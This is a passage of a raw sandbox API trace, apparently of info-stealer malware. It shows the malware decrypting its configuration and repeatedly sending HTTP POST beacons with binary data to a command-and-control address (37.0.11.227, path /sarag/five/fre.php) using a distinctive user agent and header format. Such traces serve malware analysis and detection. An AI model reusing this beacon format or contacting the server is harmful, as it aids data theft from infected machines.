HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.589] send (s=0xa40, buf=0x6ad508*, len=242, flags=0) returned 242 [0307.589] send (s=0xa40, buf=0x6aba40*, len=159, flags=0) returned 159 [0307.589] GetProcessHeap () returned 0x690000 [0307.589] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0307.589] recv (in: s=0xa40, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0307.667] GetProcessHeap () returned 0x690000 [0307.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0307.668] GetProcessHeap () returned 0x690000 [0307.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0307.668] GetProcessHeap () returned 0x690000 [0307.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0307.669] GetProcessHeap () returned 0x690000 [0307.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0307.669] closesocket (s=0xa40) returned 0 [0307.670] GetProcessHeap () returned 0x690000 [0307.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0307.670] GetProcessHeap () returned 0x690000 [0307.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0307.670] GetProcessHeap () returned 0x690000 [0307.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0307.670] GetProcessHeap () returned 0x690000 [0307.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0307.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xdec) returned 0xa40 [0307.700] Sleep (dwMilliseconds=0xea60) [0307.702] GetProcessHeap () returned 0x690000 [0307.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0307.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.711] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0307.718] GetProcessHeap () returned 0x690000 [0307.718] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0307.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.719] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.721] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.722] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.722] GetProcessHeap () returned 0x690000 [0307.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0307.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.723] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0307.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.724] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.724] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0307.725] GetProcessHeap () returned 0x690000 [0307.725] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.725] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.726] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.727] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.730] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.730] GetProcessHeap () returned 0x690000 [0307.730] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0307.730] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.730] GetProcessHeap () returned 0x690000 [0307.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0307.731] GetProcessHeap () returned 0x690000 [0307.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0307.731] GetProcessHeap () returned 0x690000 [0307.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0307.732] GetProcessHeap () returned 0x690000 [0307.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0307.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.732] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0307.746] GetProcessHeap () returned 0x690000 [0307.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0307.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.747] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.748] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.750] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.750] GetProcessHeap () returned 0x690000 [0307.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0307.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.753] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0307.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.754] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.755] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0307.755] GetProcessHeap () returned 0x690000 [0307.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.756] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0307.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.757] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0307.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.757] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0307.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.758] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0307.758] GetProcessHeap () returned 0x690000 [0307.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0307.758] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0307.758] GetProcessHeap () returned 0x690000 [0307.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3a0 [0307.758] socket (af=2, type=1, protocol=6) returned 0xa44 [0307.759] connect (s=0xa44, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0307.784] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0307.784] GetProcessHeap () returned 0x690000 [0307.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0307.784] GetProcessHeap () returned 0x690000 [0307.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0307.784] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.785] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0307.785] GetProcessHeap () returned 0x690000 [0307.785] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0307.785] GetProcessHeap () returned 0x690000 [0307.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.786] GetProcessHeap () returned 0x690000 [0307.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0307.786] GetProcessHeap () returned 0x690000 [0307.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0307.787] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0307.787] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0307.787] GetProcessHeap () returned 0x690000 [0307.787] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0307.787] GetProcessHeap () returned 0x690000 [0307.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0307.788] send (s=0xa44, buf=0x6ad508*, len=242, flags=0) returned 242 [0307.788] send (s=0xa44, buf=0x6aba40*, len=159, flags=0) returned 159 [0307.788] GetProcessHeap () returned 0x690000 [0307.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0307.789] recv (in: s=0xa44, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0307.859] GetProcessHeap () returned 0x690000 [0307.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0307.860] GetProcessHeap () returned 0x690000 [0307.860] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0307.861] GetProcessHeap () returned 0x690000 [0307.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0307.861] GetProcessHeap () returned 0x690000 [0307.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0307.862] closesocket (s=0xa44) returned 0 [0307.862] GetProcessHeap () returned 0x690000 [0307.862] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0307.862] GetProcessHeap () returned 0x690000 [0307.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0307.863] GetProcessHeap () returned 0x690000 [0307.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0307.863] GetProcessHeap () returned 0x690000 [0307.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0307.864] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17dc) returned 0xa44 [0307.865] Sleep (dwMilliseconds=0xea60) [0307.866] GetProcessHeap () returned 0x690000 [0307.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0307.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.867] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.873] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0307.878] GetProcessHeap () returned 0x690000 [0307.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0307.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.879] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.880] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.881] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.881] GetProcessHeap () returned 0x690000 [0307.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0307.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.886] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0307.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.887] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.888] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0307.888] GetProcessHeap () returned 0x690000 [0307.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.889] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0307.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.890] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0307.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.890] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0307.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.891] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0307.891] GetProcessHeap () returned 0x690000 [0307.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0307.891] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0307.892] GetProcessHeap () returned 0x690000 [0307.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0307.894] GetProcessHeap () returned 0x690000 [0307.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0307.895] GetProcessHeap () returned 0x690000 [0307.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0307.896] GetProcessHeap () returned 0x690000 [0307.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0307.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.896] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0307.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.901] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0307.906] GetProcessHeap () returned 0x690000 [0307.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0307.907] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.907] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0307.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.908] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0307.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.909] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0307.909] GetProcessHeap () returned 0x690000 [0307.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0307.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.910] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0307.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.911] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0307.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0307.911] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0307.912] GetProcessHeap () returned 0x690000 [0307.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0307.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.912] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0307.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.913] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0307.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.914] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0307.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0307.917] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0307.917] GetProcessHeap () returned 0x690000 [0307.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0307.917] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0307.917] GetProcessHeap () returned 0x690000 [0307.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0307.917] socket (af=2, type=1, protocol=6) returned 0xa48 [0307.917] connect (s=0xa48, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0307.945] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0308.872] GetProcessHeap () returned 0x690000 [0308.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0308.873] GetProcessHeap () returned 0x690000 [0308.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0308.873] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0308.874] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0308.874] GetProcessHeap () returned 0x690000 [0308.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0308.874] GetProcessHeap () returned 0x690000 [0308.875] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0308.875] GetProcessHeap () returned 0x690000 [0308.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0308.875] GetProcessHeap () returned 0x690000 [0308.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0308.876] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0308.876] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0308.876] GetProcessHeap () returned 0x690000 [0308.876] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0308.876] GetProcessHeap () returned 0x690000 [0308.877] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0308.877] send (s=0xa48, buf=0x6ad508*, len=242, flags=0) returned 242 [0308.878] send (s=0xa48, buf=0x6aba40*, len=159, flags=0) returned 159 [0308.878] GetProcessHeap () returned 0x690000 [0308.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0308.878] recv (in: s=0xa48, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0308.985] GetProcessHeap () returned 0x690000 [0308.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0308.985] GetProcessHeap () returned 0x690000 [0308.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0308.985] GetProcessHeap () returned 0x690000 [0308.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0308.986] GetProcessHeap () returned 0x690000 [0308.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0308.987] closesocket (s=0xa48) returned 0 [0308.987] GetProcessHeap () returned 0x690000 [0308.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: 